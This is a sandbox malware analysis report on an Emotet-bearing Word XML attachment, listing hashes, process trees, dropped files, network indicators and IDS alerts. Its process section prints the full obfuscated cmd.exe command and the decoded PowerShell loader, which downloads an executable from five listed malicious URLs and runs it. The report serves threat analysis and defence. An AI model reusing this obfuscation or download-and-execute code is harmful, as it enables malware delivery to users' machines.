File name: Untitled_attachment_20190122.doc

Full analysis: https://app.any.run/tasks/e4bd84dc-1f02-41cf-8193-fc5c792c5f7d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 20:06:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: 97B9807F8760B5C01E67E55C7DC38BA6
SHA1: 8383168A11E46DD9C21AC6BA13DF279840522E6B
SHA256: D85A986BB09329C2077689025F17E42359B537F9A5158193E014459E5F90FBF2
SSDEEP: 3072:7kZ2tiOgmunCTcfjL/xSu90OoiLuDKZXfwKeljR1z:7kgNuCTcfxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2920)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2920)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2588)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2708)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4064)
      • cmd.exe (PID: 2588)
    • Application launched itself

      • cmd.exe (PID: 2588)
    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2896)
    • Creates files in the user directory

      • powershell.exe (PID: 3168)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2920)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2920)
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (60.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (28.6)
.xaml | Microsoft Extensible Application Markup Language (7.7)
.xml | Generic XML (ASCII) (2.1)
.html | HyperText Markup Language (1.2)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (base64-encoded binary data omitted)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00187F7A
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00187F7A
WordDocumentBodySectPRRsidRPr: 00F17EA2
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
Total processes: 38
Monitored processes: 7
Malicious processes: 5
Suspicious processes: 0

Behavior graph

start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

Columns: PID, CMD, Path, Indicators, Parent process

PID: 2896
CMD: "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\Untitled_attachment_20190122.doc.xml"
Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: XML Editor
Exit code: 0
Version: 14.0.4750.1000

PID: 2920
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Untitled_attachment_20190122.doc.xml"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: MSOXMLED.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

4064c:\w8525\l1499\r2543\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo 
!3ud2:*3ud2!=!|cmd.exe"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2588CmD /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2620
Command line:
C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2708
Command line:
cmd.exe
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
3168
Command line:
powershell $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 348
Read events
878
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6E1C.tmp.cvr | | | |
| 2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D66F90FB.jpg | | | |
| 3168 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VRMTRYT0TC4O21IEM1OP.temp | | | |
| 2920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 18101F97A92C0DD903C719BE9DA97088 | 680B5835CDF3BBFAD2DA17F56E82CAC844748B6E8301E6E832BE10C9771F6B55 |
| 3168 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
| 2920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 620F0318517F70B148EDA15339331C30 | 2F7AB8A08BDCCC345A4E14CCC4BD28352CB771CA04253836EA1D287305F1712A |
| 2920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Untitled_attachment_20190122.doc.xml.LNK | lnk | FA546F59FDBE023CC2A500DFD7CBBF85 | 8AA936E6F63680E80351AE38BE2FE0474EDD1305067838A96EE05A5C1977C9D9 |
| 2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | AF0BF5F4A930634AA8BFE01836A6011C | 83EFE5C6560EC9A7E735A2AA14EB2440D3BE81516C8B0F9698DB65BC32B82590 |
| 2920 | WINWORD.EXE | C:\Users\admin\Desktop\~$titled_attachment_20190122.doc.xml | pgc | 7675FD942A73588311E38CB8325ECA4F | DA3662837F81AB5E02FB696D5EBAD9558203E467438C93CD32326869863A9224 |
| 3168 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247f23.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3168 | powershell.exe | GET | 404 | 216.15.213.103:80 | http://blamdigital.com/dc2cDi0 | US | xml | 345 b | malicious |
| 3168 | powershell.exe | GET | 404 | 213.202.100.12:80 | http://documentation-contest.com/APy2PMrfdo | HR | xml | 345 b | malicious |
| 3168 | powershell.exe | GET | 404 | 164.138.208.39:80 | http://jumesamedina.com/FKcXltRa | ES | xml | 345 b | malicious |
| 3168 | powershell.exe | GET | 404 | 45.252.248.16:80 | http://mariposaplus.com/idyudJzd | VN | xml | 345 b | malicious |
| 3168 | powershell.exe | GET | 404 | 94.73.146.142:80 | http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL | TR | xml | 345 b | malicious |

Connections

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3168 | powershell.exe | 45.252.248.16:80 | mariposaplus.com | AZDIGI Corporation | VN | malicious |
| 3168 | powershell.exe | 216.15.213.103:80 | blamdigital.com | CYBERCON, INC. | US | malicious |
| 3168 | powershell.exe | 164.138.208.39:80 | jumesamedina.com | Cyberneticos Hosting SL | ES | malicious |
| 3168 | powershell.exe | 213.202.100.12:80 | documentation-contest.com | ISKON INTERNET d.d. za informatiku i telekomunikacije | HR | malicious |
| 3168 | powershell.exe | 94.73.146.142:80 | enerjiiklimlendirme.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |

DNS requests

| Domain | IP | Reputation |
|---|---|---|
| jumesamedina.com | 164.138.208.39 | malicious |
| mariposaplus.com | 45.252.248.16 | malicious |
| blamdigital.com | 216.15.213.103 | malicious |
| documentation-contest.com | 213.202.100.12 | malicious |
| enerjiiklimlendirme.com | 94.73.146.142 | malicious |

Threats

| PID | Process | Class | Message |
|---|---|---|---|
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
| 3168 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
No debug info